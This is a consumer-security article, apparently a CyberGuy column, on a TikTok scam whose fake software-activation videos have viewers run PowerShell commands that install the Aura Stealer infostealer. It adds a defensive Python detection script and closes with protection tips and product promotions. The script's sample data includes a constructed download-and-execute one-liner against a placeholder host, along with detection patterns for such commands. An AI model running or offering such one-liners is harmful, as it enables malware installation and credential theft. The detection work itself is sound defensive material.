TikTok malware scam uses fake software activation guides to steal data

Cybercriminals are again turning TikTok into a trap for unsuspecting users. This time, they disguised malicious downloads as free activation guides for popular software like Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.
Security expert Xavier Mertens first spotted the campaign and confirmed that the same type of scheme was seen earlier this year. According to BleepingComputer, these fake TikTok videos show short PowerShell commands and instruct viewers to run them as administrator to “activate” or “fix” their programs.
In reality, these commands connect to a malicious website and install malware known as Aura Stealer, which silently extracts saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s computer.
Cybercriminals are using fake TikTok videos to trick users into downloading malware disguised as a free activation guide. (Kurt “CyberGuy” Knutsson)
How do TikTok scams work?
This campaign uses what experts call the ClickFix attack. This is a social engineering trick that makes victims feel like they are following legitimate technical instructions. The instructions seem quick and simple: run a short command and get instant access to the premium software.
But instead of activating anything, the PowerShell command connects to a remote domain called slmgr[.]win, which downloads malicious executables from pages hosted by Cloudflare. The main file, updater.exe, is a variant of the Aura Stealer malware. Once in the system, it searches for your credentials and sends them back to the attacker.
Another file, source.exe, uses Microsoft’s C# compiler to compile and launch code directly in memory, making it even harder to detect. The purpose of this extra payload is not yet fully known, but the pattern follows previous malware used for crypto theft and ransomware distribution.
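For defenders, here is an added example (not from the original article or from any security vendor) of a small triage heuristic for the two behaviors described above: a PowerShell one-liner that fetches and immediately executes remote content, and the C# compiler (csc.exe) being launched by a program sitting in a user-writable folder. The field names follow Sysmon process-creation events (Image, CommandLine, ParentImage); the sample events, file paths, the list of user-writable folders and the example.invalid host are constructed assumptions.

```python
import re

# Verbs that fetch remote content and verbs that execute it; a one-line
# "activation" command of the kind described chains one of each.
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I)
URL_HOST = re.compile(r"https?://([\w.-]+)", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads)\\", re.I)  # assumed path list

# Constructed sample events (not captured from the campaign).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
SAMPLE_EVENTS = [
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -c "iex (irm https://activate.example.invalid/office)"'},
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -NoProfile -Command Get-ChildItem C:\Logs"},
    {"Image": _CSC, "ParentImage": r"C:\Users\u\AppData\Local\Temp\source.exe",
     "CommandLine": r"csc.exe /noconfig @C:\Users\u\AppData\Local\Temp\x.cmdline"},
    {"Image": _CSC, "ParentImage": r"C:\BuildTools\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": "csc.exe /out:app.exe Program.cs"},
]

def classify(event):
    """Return findings for one process-creation event; a triage hint, not a verdict."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"]
    findings = []
    # PowerShell that both downloads and executes in a single command line.
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        if FETCH.search(cmd) and EXEC.search(cmd):
            findings.append(("download-and-execute", URL_HOST.findall(cmd)))
    # C# compiler started by a binary that lives in a user-writable folder.
    if image.endswith("\\csc.exe") and USER_WRITABLE.search(parent):
        findings.append(("csc-from-user-writable-parent", [parent]))
    return findings

def triage(events):
    """Map event index -> findings, keeping only events with at least one finding."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}

if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS).items():
        print(index, findings)
```

Legitimate admin scripts can also download and run content in one line, so a hit here is a reason to look closer, not proof of infection.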

These short “activation” commands secretly connect to malicious servers that install information-stealing malware like Aura Stealer. (Kurt “CyberGuy” Knutsson)
How to protect yourself from TikTok malware scams?
Even though these scams seem convincing, you can avoid being a victim with the right precautions.
1) Avoid shortcuts
Never copy or run PowerShell commands from TikTok videos or random websites. If something promises free access to premium software, it’s probably a trap.
2) Use reliable sources
Always download or activate software directly from the official website or legal app stores.
3) Keep security tools up to date
Outdated antivirus or browsers cannot detect the latest threats. Update your software regularly to stay protected.
4) Use strong antivirus software
Install powerful antivirus software that offers real-time scanning and protection against Trojans, skimmers, and phishing attempts.
The best way to protect yourself from malicious links that install malware and potentially access your private information is to have strong antivirus software installed on all your devices. This protection also keeps your personal information and digital assets safe by alerting you to phishing emails and ransomware scams.
Get my picks for the 2025 best antivirus protection winners for your Windows, Mac, Android, and iOS devices at: cyberguy.com
5) Sign up for data removal service
If your personal data ends up on the dark web, a data removal or monitoring service can alert you and help remove sensitive information.
While no service can guarantee complete removal of your data from the internet, a data removal service is truly a smart choice. They’re not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. This is what gives me peace of mind and has proven to be the most effective way to delete your personal data from the internet. By limiting the information available, you reduce the risk of fraudsters cross-referencing data obtained from breaches with information they can find on the dark web, making it harder for them to target you.
Check out my top picks for data removal services and run a free scan to see if your personal information is already on the internet by visiting: cyberguy.com
6) Reset credentials
If you followed questionable instructions or entered your credentials after watching a “free activation” video, reset all your passwords immediately.
7) Reset passwords
Start with your email, financial and social media accounts. Use unique passwords for each site. Consider using a password manager that securely stores and generates complex passwords, reducing the risk of password reuse.
Next, see if your email has been exposed in past breaches. Our #1 password manager pick (see cyberguy.com) includes a built-in breach scanner that checks to see if your email address or passwords appear in known leaks. If you find a match, immediately replace reused passwords and secure those accounts with new, unique credentials.
Check out the best expert-reviewed password managers of 2025 at: cyberguy.com
8) Enable multi-factor authentication
Add an extra layer of security by enabling multi-factor authentication wherever possible. Even if your passwords are stolen, attackers will not be able to log in without your verification.

If you followed questionable steps, change your passwords, enable two-factor authentication, and be alert for future scams. (Getty Images)
Kurt’s important takeaways
TikTok’s global reach makes it a prime target for such scams. What seems like a useful hack could cost you your security, money, and peace of mind. Be careful, trust only verified sources, and remember that there is no such thing as a free activation shortcut.
Is TikTok doing enough to protect its users from scams like these? Let us know by writing to us at cyberguy.com
Copyright 2025 CyberGuy.com. All rights reserved.



